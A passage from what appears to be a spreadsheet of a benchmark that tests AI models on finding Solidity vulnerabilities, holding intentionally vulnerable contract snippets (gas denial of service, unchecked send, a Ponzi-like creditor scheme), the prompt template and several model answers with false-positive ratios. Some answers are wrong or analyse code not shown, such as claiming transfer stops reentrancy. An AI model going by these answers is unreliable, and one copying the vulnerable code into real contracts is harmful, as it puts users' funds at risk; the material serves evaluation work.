b) Consider replacing `block.blockhash` with a secure and deterministic random number generation method that is not dependent on the block number, which can be manipulated by miners.
c) If the function is intended to be non-deterministic, ensure that all potential outcomes are considered and handled properly to prevent unexpected results or vulnerabilities.
Without more context or the full contract code, it's not possible to provide a more detailed analysis. For example, how and where `bets`, `betPrize`, `hashesSize`, `hashFirst`, and `getHash` are defined and used can significantly impact the security of the contract.</t>
  </si>
  <si>
    <t>1. Yes.
2. how this vulnerability can be exploited :
   - **block.blockhash(player.blockNum)**: The `blockhash` function provides the hash of one of the 256 most recent blocks, excluding the current block. This means that if more than 256 blocks have passed since the player's bet, the hash becomes predictable because it will always return zero.
   - **block.number**: The current block number can be influenced to a certain extent by miners. A miner, for instance, could opt to not include a bet transaction until a certain block that they believe would be favorable to them.
   - **hashFirst&gt;0 and getHash(player.blockNum)**: It is unclear from the provided code what `hashFirst` and `getHash` do, but if `getHash` uses some form of predictable randomness or data that can be influenced, then it might also present a vulnerability.
3. The business impact of these vulnerabilities in one sentence: Predictable blockhash function leads to potential gaming of the system by miners or users who wait more than 256 blocks.
4. The potential solutions of these vulnerabilities:
   - Avoid relying solely on `block.blockhash` for randomness. If you must use it, ensure that you combine it with other sources of entropy.
   - Introduce a time limit for bets to be resolved (less than 256 blocks) to ensure that `block.blockhash` remains unpredictable.
   - If possible, use a commit-reveal scheme or an off-chain source of randomness, such as Chainlink VRF (Verifiable Random Function), to ensure provably fair outcomes.
   - Ensure that any other sources of randomness, such as `getHash`, are robust and cannot be easily manipulated.</t>
  </si>
  <si>
    <t>false positive ratio = 3/(10+3)=0.2308</t>
  </si>
  <si>
    <t>false positive ratio = 3 / (29+3) = 0.09375</t>
  </si>
  <si>
    <t>dataset/denial_of_service/dos_address.sol</t>
  </si>
  <si>
    <t xml:space="preserve">    function emptyCreditors() public {
        if(creditorAddresses.length&gt;1500) {
            creditorAddresses = new address[](0);
            win = true;
        }
    }
Understand this code and analyze it, respond me in this format  (fill in the part with ___): 1. Is there any vulnerabilities? give me a short answer in the beginning of your response,choose one from the following three: yes, no, or not sure. If your answer is no, stop here; If your choice is yes, 2. Explain in details how this vulnerability can be exploited:_______. 3. The business impact of this vulnerabilities in one sentence: ___ function leads to _____. 4.The potential solutions of this vulnerabilities:_________. Note: You can state more than one lines which have this vulnerability! This is a short extraction of the solidity code and please assume all the variables in this code have been defined. Please ignore the spelling problem.</t>
  </si>
  <si>
    <t>I will review the provided Solidity code and analyze it for denial of service vulnerabilities based on the instructions you've given. Let's first take a look at the content of the code.
After reviewing the code, here's the analysis:
1. Is there any denial of service vulnerabilities?
**Yes.**
2. Explain in details how this vulnerability can be exploited:
The contract has a function `emptyCreditors()` which empties the `creditorAddresses` array if its length is more than 1500. However, any user can repeatedly call the `addCreditors()` function which will add their address 350 times in a loop to the `creditorAddresses` array. As a result, if an attacker continuously calls the `addCreditors()` function, the `creditorAddresses` array's length will continuously increase, making it more expensive in terms of gas for any honest user to call the `emptyCreditors()` function. This could make it almost impossible for any honest user to call `emptyCreditors()` due to the excessive gas cost, leading to a denial of service.
3. The business impact of this vulnerabilities in one sentence:
The `addCreditors()` function leads to excessive gas consumption, making it expensive for honest users to call the `emptyCreditors()` function.
4. The potential solutions of this vulnerabilities:
- Limit the number of times an address can call the `addCreditors()` function.
- Implement a cap on the `creditorAddresses` array length and reject any further additions once the cap is reached.
- Instead of adding the address multiple times in a loop, consider adding it only once per call and maybe implement a mechanism to track and limit the frequency of calls from the same address.
- Consider using a mapping with addresses as keys and their count as values. This will avoid the need to store multiple instances of the same address and make the `emptyCreditors()` function independent of the number of addresses stored.</t>
  </si>
  <si>
    <t>1. Is there any vulnerabilities? Yes.
2. Explain in details how this vulnerability can be exploited:
This function has a potential vulnerability related to gas costs. In Ethereum, the execution of functions costs gas, which is a measure of computational effort. The `emptyCreditors()` function is trying to delete a potentially large array (`creditorAddresses`) if its length is greater than 1500. The operation of deleting a large array could exceed the block gas limit, causing the transaction to fail.
3. The business impact of this vulnerabilities in one sentence: The `emptyCreditors()` function could lead to failed transactions and potential denial of service if the `creditorAddresses` array becomes too large.
4. The potential solutions of this vulnerabilities:
Instead of deleting the entire array at once, consider implementing a method to delete entries one at a time or in small chunks. This would allow the gas cost to be spread over multiple transactions, preventing any single transaction from exceeding the block gas limit. Here is an example:
```solidity
function removeCreditor(uint index) public {
    if (index &gt;= creditorAddresses.length) return;
    for (uint i = index; i&lt;creditorAddresses.length-1; i++){
        creditorAddresses[i] = creditorAddresses[i+1];
    }
    creditorAddresses.length--;
}
```
Another alternative solution is to change the data structure used for managing creditors. Instead of using an array, using a mapping with an address as a key and a boolean as a value could be more gas efficient and would avoid this issue. Note that this would change how creditors are managed and would require changes elsewhere in the code.
```solidity
mapping (address =&gt; bool) creditors;
function removeCreditor(address creditor) public {
    creditors[creditor] = false;
}
```
Please note that both of these solutions assume that you have some form of access control or other mechanisms in place to prevent unauthorized calls to these functions.</t>
  </si>
  <si>
    <t>1. Is there any denial of service vulnerabilities? 
**Yes**
2. Proof of concept of this vulnerability:
The vulnerability arises from the fact that the `emptyCreditors` function can be called by any external actor (`public` access) and can wipe out all the creditor addresses from the `creditorAddresses` array if the array's length is more than 1500. 
3. The business impact of this vulnerability in one sentence:
The `emptyCreditors` function leads to the potential loss of all creditor address data.
4. The potential solutions for this vulnerability:
a. Restrict access to the `emptyCreditors` function to only trusted addresses, for example, by using the `onlyOwner` modifier (assuming a typical ownership pattern is in place).
b. Add additional checks or conditions before allowing the clearing of the `creditorAddresses` array.
c. Implement a backup mechanism to recover the creditor addresses if they are accidentally or maliciously deleted.</t>
  </si>
  <si>
    <t>1. Vulnerabilities: No
2. Proof of concept of this vulnerability: N/A (Not applicable, as there are no vulnerabilities)
3. The business impact of this vulnerability in one sentence: N/A (Not applicable, as there are no vulnerabilities)
4. Potential solutions of this vulnerability: N/A (Not applicable, as there are no vulnerabilities)
Explanation:
The provided Solidity function "emptyCreditors" does not seem to have any vulnerabilities. It checks if the length of the "creditorAddresses" array is greater than 1500, and if so, it empties the array and sets the "win" variable to true. From the given code, there are no indications of any security issues or potential vulnerabilities.
As there are no vulnerabilities, proof of concept, business impacts, or potential solutions are not applicable in this case. The function appears to be safe and does not require any fixes.</t>
  </si>
  <si>
    <t>dos_number.sol</t>
  </si>
  <si>
    <t xml:space="preserve">    function insertNnumbers(uint value,uint numbers) public {
        // Gas DOS if number &gt; 382 more or less, it depends on actual gas limit
        for(uint i=0;i&lt;numbers;i++) {
            if(numElements == array.length) {
                array.length += 1;
            }
            array[numElements++] = value;
        }
    }
Understand this code and analyze it, respond me in this format  (fill in the part with ___): 1. Is there any vulnerabilities? give me a short answer in the beginning of your response,choose one from the following three: yes, no, or not sure. If your answer is no, stop here; If your choice is yes, 2. Explain in details how this vulnerability can be exploited:_______. 3. The business impact of this vulnerabilities in one sentence: ___ function leads to _____. 4.The potential solutions of this vulnerabilities:_________. Note: You can state more than one lines which have this vulnerability! This is a short extraction of the solidity code and please assume all the variables in this code have been defined. Please ignore the spelling problem.</t>
  </si>
  <si>
    <t>Let's start by reading and understanding the content of the provided Solidity code.
1. Are there any denial of service vulnerabilities?
After examining the code, my answer is: **yes**.
2. how this vulnerability can be exploited :
   - The `insertNnumbers` function can be used to insert a large number of elements into the `array` by setting the `numbers` parameter to a high value. This can cause the blockchain transaction to run out of gas, especially if called repeatedly.
   - The `clearDOS` function has a vulnerability where it tries to delete a large array, which can lead to an excessive gas consumption and make it difficult or impossible for other functions to be executed due to gas limits.
3. The business impact of these vulnerabilities in one sentence:
   - The `insertNnumbers` function can lead to gas exhaustion, and the `clearDOS` function can make the contract unusable due to high gas costs.
4. The potential solutions for these vulnerabilities:
   - For `insertNnumbers`: Introduce a limit on the maximum value for the `numbers` parameter to prevent excessive array insertions in a single transaction.
   - For `clearDOS`: Instead of deleting the entire array at once, consider deleting it in smaller chunks across multiple transactions or reset the `numElements` counter without resetting the entire array. Also, consider using a more efficient data structure or storage mechanism.</t>
  </si>
  <si>
    <t>1. Yes, there are vulnerabilities in this Solidity code snippet.
2. how this vulnerability can be exploited :
   - This code is vulnerable to Denial of Service (DoS) attacks due to its unbounded loop, as suggested in the comment. The for-loop can potentially run a high number of iterations (up to the value of "numbers"), which can consume a significant amount of gas. If the gas used exceeds the gas limit for a block, the transaction will fail, but the gas will still be consumed. This can be exploited by an attacker who can call this function with a high "numbers" value, effectively causing a DoS attack.
   - The code lacks access control mechanisms. Anybody can call the function `insertNnumbers` and manipulate the array. This could lead to unauthorized access or alteration of the array data.
3. The business impact of these vulnerabilities in one sentence: The `insertNnumbers` function leads to potential Denial of Service attacks and unauthorized data manipulation.
4. The potential solutions of these vulnerabilities:
   - Implement a bound check for the "numbers" parameter to ensure it doesn't exceed a certain safe limit. This can prevent the function from consuming an excessive amount of gas and mitigates the risk of a DoS attack. Here's a simplified version of how you might add a guard clause to the function:
     ```solidity
     require(numbers &lt;= MAX_NUMBERS, "numbers is too large");
     ```
   - Implement access control mechanisms to restrict who can call this function. This could be a simple address-based access control (only a specific address, like the contract owner, can call the function), or a more complex role-based access control. Here's a simple example of address-based access control:
     ```solidity
     require(msg.sender == owner, "Caller is not owner");
     ```
     In this example, `owner` would be set in the contract's constructor to `msg.sender`, the address that deployed the contract.</t>
  </si>
  <si>
    <t>Let's start by reading and understanding the content of the provided Solidity code.
1. Are there any denial of service vulnerabilities?
After examining the code, my answer is: **yes**.
2. how this vulnerability can be exploited :
   - The `insertNnumbers` function can be used to insert a large number of elements into the `array` by setting the `numbers` parameter to a high value. This can cause the blockchain transaction to run out of gas, especially if called repeatedly.
   - The `clearDOS` function has a vulnerability where it tries to delete a large array, which can lead to an excessive gas consumption and make it difficult or impossible for other functions to be executed due to gas limits.
3. The business impact of these vulnerabilities in one sentence:
   - The `insertNnumbers` function can lead to gas exhaustion, and the `clearDOS` function can make the contract unusable due to high gas costs.
4. The potential solutions for these vulnerabilities:
   - For `insertNnumbers`: Introduce a limit on the maximum value for the `numbers` parameter to prevent excessive array insertions in a single transaction.
   - For `clearDOS`: Instead of deleting the entire array at once, consider deleting it in smaller chunks across multiple transactions or reset the `numElements` counter without resetting the entire array. Also, consider using a more efficient data structure or storage mechanism.</t>
  </si>
  <si>
    <t>1. Yes.
2. Proof of concept of this vulnerability:
   - The code contains a loop that runs `numbers` times. Inside the loop, the code checks if the array is full (`numElements == array.length`). If it is, the code increases the length of the array by one. As the `numbers` input increases, the amount of gas required to execute the `insertNnumbers` function also increases. This can lead to a situation where the caller specifies a large value for `numbers`, causing the function to consume all available gas and fail. If the gas limit is exceeded, the function will fail, but the caller will still lose the gas used up to that point. This type of vulnerability is commonly referred to as a Gas DOS (Denial of Service) attack.
3. The business impact of this vulnerability in one sentence:
   The `insertNnumbers` function leads to a potential Gas DOS, where an attacker can cause the function to consume all available gas, making it fail and causing loss of gas for the caller.
4. The potential solutions of this vulnerability:
   - Implement a fixed or maximum limit for the `numbers` input to prevent extremely large values.
   - Instead of increasing the array length by one in each iteration, consider using a dynamic resizing strategy where the array size is doubled when it needs to grow. This will significantly reduce the number of resizing operations and gas consumption.
   - Ensure that you have proper checks and measures in place to handle out-of-gas exceptions gracefully.
   - Consider using a pattern where users can insert values one by one or in smaller batches, rather than allowing arbitrary batch sizes.</t>
  </si>
  <si>
    <t>1. Vulnerabilities: Yes.
2. Proof of Concept:
The vulnerability in the given code is related to the unchecked increase in the size of the array. If the input value of `numbers` is excessively large, the for loop can lead to an Out-of-Gas (OOG) exception due to running out of gas during the transaction execution. This can happen if the number of iterations in the loop exceeds the maximum gas limit for a transaction block.
3. Business Impact:
This function leads to a Denial-of-Service (DoS) vulnerability. An attacker could potentially abuse this vulnerability to consume a large amount of gas in a single transaction, preventing other legitimate transactions from being executed on the Ethereum network.
4. Potential Solutions:
To mitigate this vulnerability, you can use the SafeMath library or similar methods to perform arithmetic operations to prevent integer overflow and add a limit to the number of iterations allowed in the loop to avoid excessive gas consumption.
Here's an improved version of the code using SafeMath:
```solidity
import "./SafeMath.sol"; // Import SafeMath library
contract YourContract {
    using SafeMath for uint256;
    uint256[] array;
    uint256 numElements = 0;
    function insertNnumbers(uint256 value, uint256 numbers) public {
        for (uint256 i = 0; i &lt; numbers; i++) {
            if (numElements == array.length) {
                array.push(value);
            } else {
                array[numElements] = value;
            }
            numElements = numElements.add(1);
        }
    }
}
```
By using SafeMath for arithmetic and using the `push` method to add elements to the array, you can avoid the vulnerability and ensure that the gas consumption stays within safe limits. Additionally, you could add a maximum limit for `numbers` to further restrict the number of iterations allowed in a single call.</t>
  </si>
  <si>
    <t>dataset/denial_of_service/dos_simple.sol</t>
  </si>
  <si>
    <t xml:space="preserve">  function ifillArray() public returns (bool){
        if(listAddresses.length&lt;1500) {
            for(uint i=0;i&lt;350;i++) {
                listAddresses.push(msg.sender);
            }
            return true;
        } else {
            listAddresses = new address[](0);
            return false;
        }
</t>
  </si>
  <si>
    <t>Let's start by reading and understanding the provided Solidity code.
Based on the provided Solidity code, the `DosNumber` contract has the following methods:
1. `insertNnumbers(uint value, uint numbers)`: Inserts the `value` N times (`numbers` times) into the `array`.
2. `clear()`: Resets the `numElements` to 0 if it's greater than 1500.
3. `clearDOS()`: Clears the entire `array` and resets the `numElements` to 0 if `numElements` is greater than 1500.
4. `getLengthArray()`: Returns the `numElements`.
5. `getRealLengthArray()`: Returns the actual length of the `array`.
Now, I'll analyze the code for any denial of service (DoS) vulnerabilities.
1. Are there any denial of service vulnerabilities?
1. Yes.
2. how this vulnerability can be exploited :
   - The function `insertNnumbers` allows a user to insert an arbitrary number of values into the `array`. If this function is called multiple times with a high value for `numbers`, it can significantly increase the storage size of the `array`. This can lead to a scenario where the gas required to clear the `array` using the `clearDOS` function exceeds the block gas limit, making it impossible to execute the `clearDOS` function.
   - The `clear` function resets only the `numElements` variable without modifying the underlying `array`. This is inefficient and can leave a large amount of data in the `array`, which still incurs storage costs.
3. The business impact of these vulnerabilities in one sentence: 
   - The `insertNnumbers` function leads to a potential gas limit exceedance, making it impossible to clear the data.
4. The potential solutions for these vulnerabilities:
   - Limit the maximum value of the `numbers` parameter in the `insertNnumbers` function.
   - In the `clear` function, consider resizing the underlying `array` to a smaller size or resetting it completely.
   - Implement a mechanism to clear data in chunks, ensuring that clearing data does not exceed the block gas limit.</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
    a. **Unbounded Loops**: The loop will always attempt to push `msg.sender` 350 times to the `listAddresses` array. If `listAddresses.length` is 1450, for example, the loop will cause an out-of-gas exception because it will try to push more than the allowed length.
    b. **Denial of Service (DoS)**: Any user can fill up the array to its maximum limit and then the next transaction will clear the entire array. An attacker can keep filling the array, and whenever someone else tries to add to it, the array will be cleared, preventing legitimate users from adding their addresses.
3. The business impact of these vulnerabilities in one sentence:
    a. **Unbounded Loops**: This can lead to out-of-gas exceptions, causing failed transactions.
    b. **Denial of Service (DoS)**: The `ifillArray` function leads to potential denial of service where legitimate users may be prevented from adding their addresses.
4. The potential solutions of these vulnerabilities:
    a. **Unbounded Loops**: Instead of hardcoding the loop to always push 350 times, determine the maximum number of times you can push to the array without exceeding the limit. This can be done by calculating the difference between the current array length and the maximum allowed length (1500 in this case).
    b. **Denial of Service (DoS)**: Do not clear the entire array when its length exceeds 1500. Instead, consider implementing a more controlled mechanism for adding addresses, such as allowing only authorized addresses to add or implementing a fee-based addition system to disincentivize spamming.</t>
  </si>
  <si>
    <t>Let's start by reading and understanding the provided Solidity code.
Based on the provided Solidity code, the `DosNumber` contract has the following methods:
1. `insertNnumbers(uint value, uint numbers)`: Inserts the `value` N times (`numbers` times) into the `array`.
2. `clear()`: Resets the `numElements` to 0 if it's greater than 1500.
3. `clearDOS()`: Clears the entire `array` and resets the `numElements` to 0 if `numElements` is greater than 1500.
4. `getLengthArray()`: Returns the `numElements`.
5. `getRealLengthArray()`: Returns the actual length of the `array`.
Now, I'll analyze the code for any denial of service (DoS) vulnerabilities.
1. Are there any denial of service vulnerabilities?
1. Yes.
2. how this vulnerability can be exploited :
   - The function `insertNnumbers` allows a user to insert an arbitrary number of values into the `array`. If this function is called multiple times with a high value for `numbers`, it can significantly increase the storage size of the `array`. This can lead to a scenario where the gas required to clear the `array` using the `clearDOS` function exceeds the block gas limit, making it impossible to execute the `clearDOS` function.
   - The `clear` function resets only the `numElements` variable without modifying the underlying `array`. This is inefficient and can leave a large amount of data in the `array`, which still incurs storage costs.
3. The business impact of these vulnerabilities in one sentence: 
   - The `insertNnumbers` function leads to a potential gas limit exceedance, making it impossible to clear the data.
4. The potential solutions for these vulnerabilities:
   - Limit the maximum value of the `numbers` parameter in the `insertNnumbers` function.
   - In the `clear` function, consider resizing the underlying `array` to a smaller size or resetting it completely.
   - Implement a mechanism to clear data in chunks, ensuring that clearing data does not exceed the block gas limit.</t>
  </si>
  <si>
    <t>1. Are there any denial of service vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
- If `listAddresses.length` is less than 1500, the function tries to push the `msg.sender` address to the `listAddresses` array 350 times. If multiple transactions call this function in quick succession, it can quickly fill up the `listAddresses` array to reach its limit, and once it does, the next transaction will empty the entire array. This allows for potential abuse where an attacker can repeatedly call this function to constantly reset the array, effectively denying other users the ability to use or rely on the array's data.
3. The business impact of these vulnerabilities in one sentence: 
- The `ifillArray` function leads to potential loss of stored addresses due to repeated calls.
4. The potential solutions to these vulnerabilities:
- Implement a rate limiter or cooldown period for the function so that a single address cannot call it multiple times within a short period.
- Instead of clearing the entire array when the length is 1500 or more, consider implementing a system where older addresses are removed to make space for new ones. This way, data is not lost entirely.
- Limit the number of addresses an individual can add in one call. Pushing the same address 350 times may not always be necessary.
- Implement access controls so that only authorized addresses can call the function.</t>
  </si>
  <si>
    <t>1. Vulnerabilities: Yes
2. Proof of concept of this vulnerability:
The vulnerability in this code is related to the unchecked growth of the `listAddresses` array. When the `ifillArray` function is called, it appends 350 copies of the `msg.sender` to the `listAddresses` array until the array size reaches 1500. However, there is no check to prevent this array from becoming excessively large, potentially causing an Out-of-Gas error or running into other limitations of the Ethereum Virtual Machine.
3. The business impact of this vulnerability in one sentence:
This function leads to unbounded array growth, which can result in high transaction costs, execution failures, and overall disruption of the application or contract.
4. Potential solutions of this vulnerability:
To prevent unbounded array growth and mitigate the associated risks, the code can be improved in the following ways:
- Implement a mechanism to limit the number of times the function can be called.
- Introduce a cap on the maximum size of the `listAddresses` array to avoid excessive growth.
- Consider using a data structure that supports dynamic resizing, such as a linked list or a mapping, instead of an array.
Additionally, it's essential to carefully consider the use case and determine if storing a large number of addresses in a single array is necessary. If the purpose is to keep track of multiple addresses, a more scalable approach, like using a database or pagination, might be more suitable.</t>
  </si>
  <si>
    <t>dataset/denial_of_service/list_dos.sol</t>
  </si>
  <si>
    <t xml:space="preserve"> function lendGovernmentMoney(address buddy) returns (bool) {
         uint amount = msg.value;
         // check if the system already broke down. If for 12h no new creditor gives new credit to the system it will brake down.
         // 12h are on average = 60*60*12/12.5 = 3456
         if (lastTimeOfNewCredit + TWELVE_HOURS &lt; block.timestamp) {
             // Return money to sender
             msg.sender.send(amount);
             // Sends all contract money to the last creditor
             creditorAddresses[creditorAddresses.length - 1].send(profitFromCrash);
             corruptElite.send(this.balance);
             // Reset contract state
             lastCreditorPayedOut = 0;
             lastTimeOfNewCredit = block.timestamp;
             profitFromCrash = 0;
             creditorAddresses = new address[](0);
             creditorAmounts = new uint[](0);
             round += 1;
             return false;
         }
         else {
             // the system needs to collect at least 1% of the profit from a crash to stay alive
             if (amount &gt;= 10 ** 18) {
                 // the System has received fresh money, it will survive at leat 12h more
                 lastTimeOfNewCredit = block.timestamp;
                 // register the new creditor and his amount with 10% interest rate
                 creditorAddresses.push(msg.sender);
                 creditorAmounts.push(amount * 110 / 100);
                 // now the money is distributed
                 // first the corrupt elite grabs 5% - thieves!
                 corruptElite.send(amount * 5/100);
                 // 5% are going into the economy (they will increase the value for the person seeing the crash comming)
                 if (profitFromCrash &lt; 10000 * 10**18) {
                     profitFromCrash += amount * 5/100;
                 }
                 // if you have a buddy in the government (and he is in the creditor list) he can get 5% of your credits.
                 // Make a deal with him.
                 if(buddies[buddy] &gt;= amount) {
                     buddy.send(amount * 5/100);
                 }
                 buddies[msg.sender] += amount * 110 / 100;
                 // 90% of the money will be used to pay out old creditors
                 if (creditorAmounts[lastCreditorPayedOut] &lt;= address(this).balance - profitFromCrash) {
                     creditorAddresses[lastCreditorPayedOut].send(creditorAmounts[lastCreditorPayedOut]);
                     buddies[creditorAddresses[lastCreditorPayedOut]] -= creditorAmounts[lastCreditorPayedOut];
                     lastCreditorPayedOut += 1;
                 }
                 return true;
             }
             else {
                 msg.sender.send(amount);
                 return false;
             }
</t>
  </si>
  <si>
    <t>Alright, let's start by reading and examining the provided Solidity code to identify potential denial of service (DoS) vulnerabilities.
From the code provided, I will now analyze it to check for any potential denial of service (DoS) vulnerabilities.
### Vulnerability Analysis:
1. The function `lendGovernmentMoney` contains the code `msg.sender.send(amount);` which sends ether back to the sender. The `send` method in Solidity has a gas stipend of 2300 gas, meaning if the receiving contract (the sender in this case) has a fallback function that consumes more than 2300 gas, the `send` method will fail. If the sender is a malicious contract with a fallback function designed to always fail (i.e., consuming more than 2300 gas), it can prevent the `lendGovernmentMoney` function from executing its logic after the `send` call. This is a classic DoS vulnerability known as the "unbounded gas consumption" pattern. 
2. Similarly, the code contains `creditorAddresses[creditorAddresses.length - 1].send(profitFromCrash);` and `corruptElite.send(this.balance);`. These are also vulnerable to the same issue.
3. The loops in `totalDebt` and `totalPayedOut` are iterating over potentially large arrays without bounding the number of iterations. If the arrays `creditorAmounts` or `creditorAddresses` become too large, these functions can consume all the gas provided to a transaction, making it impossible to successfully call them. This is a potential DoS attack known as the "for loop with unbounded gas" pattern.
### Response:
1. **Are there any denial of service vulnerabilities?** 
   - Yes.
2. **how this vulnerability can be exploited :** 
   - For the unbounded gas consumption vulnerability: A malicious contract can be created with a fallback function that consumes more than 2300 gas. By interacting with the `lendGovernmentMoney` function of the given contract, the malicious contract can ensure that the `send` method fails, preventing further logic in the `lendGovernmentMoney` function.
   - For the for loop with unbounded gas vulnerability: By adding a large number of creditors to the `creditorAmounts` or `creditorAddresses` arrays, an attacker can ensure that the `totalDebt` or `totalPayedOut` functions run out of gas when called.
3. **The business impact of these vulnerabilities in one sentence:** 
   - The "unbounded gas consumption" vulnerability can prevent the contract from executing its logic, potentially leading to financial losses, while the "for loop with unbounded gas" vulnerability can render the `totalDebt` or `totalPayedOut` functions unusable.
4. **The potential solutions of these vulnerabilities:**
   - For the unbounded gas consumption vulnerability: Instead of using the `send` method, use the `transfer` method or implement a withdrawal pattern where users can withdraw their funds by calling a separate function.
   - For the for loop with unbounded gas vulnerability: Implement pagination or limit the number of iterations in the loop. Another solution is to maintain a running total instead of calculating it every time the function is called.</t>
  </si>
  <si>
    <t>1. **Are there any vulnerabilities?** 
   Yes.
2. **how this vulnerability can be exploited :** 
   - **Reentrancy Attack**: The function uses the `send` method to send ethers. A malicious contract can be set up to call the `lendGovernmentMoney` function in its fallback function. If the malicious contract is in the `creditorAddresses`, it can repeatedly drain the funds by triggering the fallback function, which calls `lendGovernmentMoney` again before the original call is completed.
   - **Gas Limit**: The `send` method can fail if the recipient's fallback function runs out of gas. This is because `send` only provides a limited amount of gas (2300 gas) to the fallback function. If it fails, the funds won't be transferred but the contract logic will continue to execute.
   - **Unbounded Loops**: The array `creditorAddresses` can keep growing indefinitely, and there is no check to limit its size. If the array grows too large, operations on it (like `creditorAddresses.length`) could exceed the block gas limit, rendering certain parts of the contract inoperable.
   - **Underflow**: If `lastCreditorPayedOut` is 0 and there is a scenario where it gets decremented, it can cause underflow leading to a very large value, potentially breaking the logic of the contract.
3. **The business impact of these vulnerabilities in one sentence:** 
   - **Reentrancy Attack**: Malicious users can drain funds from the contract.
   - **Gas Limit**: Funds can get stuck in the contract due to failed `send` operations.
   - **Unbounded Loops**: As the `creditorAddresses` array grows, it can make the contract inoperable.
   - **Underflow**: Incorrect calculations can disrupt the proper functioning of the contract.
4. **The potential solutions to these vulnerabilities:**
   - **Reentrancy Attack**: Use the Checks-Effects-Interactions pattern. Ensure that all state changes and effects (like sending ethers) are done at the very end of the function.
   - **Gas Limit**: Instead of using `send`, use the `transfer` method, or better yet, use the `call` method with adequate gas and handle potential failures.
   - **Unbounded Loops**: Introduce a mechanism to limit the size of the `creditorAddresses` array. Paginate or shard operations that deal with the entire array to ensure they do not exceed the gas limit.
   - **Underflow**: Use SafeMath or other safe arithmetic operations to prevent underflows and overflows in the contract.
Note: This analysis is based on the provided code snippet. A complete review would require more information about the entire contract and its context.</t>
  </si>
  <si>
    <t>Analyzing the provided Solidity code:
1. **Are there any denial of service vulnerabilities?** 
   Yes.
2. **how this vulnerability can be exploited :**
   - The code uses the `.send()` method to send Ether. The `.send()` method has a stipend of 2300 gas which can fail when the receiving contract consumes more than that (e.g., in its fallback function). If this happens, the sending transaction will revert, but the code does not check the return value of `.send()`. This can lead to cases where Ether is not sent, but the state of the contract assumes it was.
   - If a malicious actor creates a contract with a fallback function that uses more than 2300 gas and becomes a creditor, the `.send()` method will fail. This means that the subsequent creditors might not get paid, even if the balance of the contract has enough funds, leading to a denial of service for those creditors.
   - Specifically, the lines which can potentially have this vulnerability include:
     - `msg.sender.send(amount);`
     - `creditorAddresses[creditorAddresses.length - 1].send(profitFromCrash);`
     - `corruptElite.send(this.balance);`
     - `corruptElite.send(amount * 5/100);`
     - `buddy.send(amount * 5/100);`
     - `creditorAddresses[lastCreditorPayedOut].send(creditorAmounts[lastCreditorPayedOut]);`
3. **The business impact of these vulnerabilities in one sentence:**
   The use of `.send()` without checking its return value can lead to failed payments, causing a denial of service for creditors and potential loss of funds.
4. **The potential solutions of these vulnerabilities:**
   - Always check the return value of `.send()`. If it returns `false`, take appropriate actions such as reverting the transaction or logging an event.
   - Consider using the `.transfer()` method which throws an exception if the call fails, ensuring that state changes in the current contract will be reverted.
   - Alternatively, use the pull payment pattern (also known as the withdrawal pattern) where users withdraw their funds from the contract rather than having the contract send the funds directly. This avoids the risk of a failed send due to the called contract consuming too much gas.</t>
  </si>
  <si>
    <t>1. Vulnerabilities: Yes
2. Proof of concept of this vulnerability: The code is susceptible to a reentrancy attack. The `msg.sender.send(...)` and `corruptElite.send(...)` functions are used to transfer funds. If these contracts (corresponding to `msg.sender` and `corruptElite`) have fallback functions that trigger external contract calls, an attacker could potentially exploit this and reenter the `lendGovernmentMoney` function before it completes its execution, leading to unexpected behavior and fund manipulation.
3. The business impact of this vulnerability in one sentence: This function leads to potential reentrancy attacks, allowing attackers to manipulate funds and disrupt the intended behavior of the contract.
4. Potential solutions of this vulnerability:
   - Use the `transfer` method instead of `send` to prevent reentrancy attacks. The `transfer` method is a non-reentrant function that prevents the reentrant call of fallback functions during the transfer of funds.
   - Consider using the latest Solidity version and best practices to prevent common vulnerabilities, and perform comprehensive security audits on the smart contract code.</t>
  </si>
  <si>
    <t>dataset/denial_of_service/send_loop.sol</t>
  </si>
  <si>
    <t xml:space="preserve">    function refundAll() public {
        for(uint x; x &lt; refundAddresses.length; x++) { // arbitrary length iteration based on how many addresses participated
            require(refundAddresses[x].send(refunds[refundAddresses[x]])); // doubly bad, now a single failure on send will hold up all funds
        }
    }</t>
  </si>
  <si>
    <t>I will start by reading and analyzing the provided Solidity code to identify any vulnerabilities.
1. **Are there any vulnerabilities?**
   Not sure.
2. **how this vulnerability can be exploited :**
   - The `refundAll` function iterates over the `refundAddresses` array and tries to send funds to each address. The problem here is that the `send` function only provides 2300 gas, which might not be enough if the recipient is a contract that has a fallback function with more than 2300 gas usage. If sending fails for one address (e.g., due to a fallback function in a contract that consumes more than 2300 gas), the `require` statement will revert the entire transaction. This means that if one refund fails, all subsequent refunds in the loop will not be processed.
   - Using loops that iterate over a state variable of an arbitrary length is bad practice. As more addresses are added to `refundAddresses`, the `refundAll` function could eventually run out of gas, preventing any refunds from being processed.
3. **The business impact of these vulnerabilities in one sentence:**
   The `refundAll` function leads to potential funds lock-up and high gas costs, which can prevent users from receiving their refunds.
4. **The potential solutions to these vulnerabilities:**
   - Use the `transfer` method instead of `send` for a safer way to send ether. Although it also provides only 2300 gas, the `transfer` method will revert the transaction if it fails, making it clearer where the error is.
   - Instead of iterating over all addresses in the contract, consider creating a function that allows users to claim their refunds individually. This will distribute the gas cost to each user and prevent the potential gas limit issues. The function can look something like this:
     ```solidity
     function claimRefund() public {
         uint refundAmount = refunds[msg.sender];
         require(refundAmount &gt; 0, "No funds to refund");
         refunds[msg.sender] = 0;
         msg.sender.transfer(refundAmount);
     }
     ```
   - If there's a need to refund all users in a single transaction (e.g., by an admin), consider using patterns like the gas station network or meta transactions to mitigate gas limit issues. Another alternative is to break the refund process into multiple batches.</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
**Yes**
2. how this vulnerability can be exploited :
    - **Reentrancy Attack**: The `refundAll` function uses the `send` method for transferring ether. If a malicious contract is present in the `refundAddresses` array, it could execute a fallback function upon receiving ether, which could in turn call `refundAll` again before the first transaction completes. This could allow an attacker to drain more funds than they are entitled to.
    - **Gas Limit Issues**: Iterating over an arbitrary length array with a `for` loop can lead to gas limit issues. If the `refundAddresses` array is very large, the `refundAll` function may run out of gas and fail, which means that not all participants would get their refunds. Furthermore, if just one `send` fails, the entire transaction will revert due to the `require` statement, potentially causing no refunds to be processed.
    - **Single Point of Failure with `require`**: Using `require` with the `send` method means that if one send operation fails (for example, due to a contract's fallback function consuming too much gas), then the entire `refundAll` function will revert, and no further refunds will be processed.
3. The business impact of these vulnerabilities in one sentence:
    - The `refundAll` function is susceptible to reentrancy attacks leading to theft of funds.
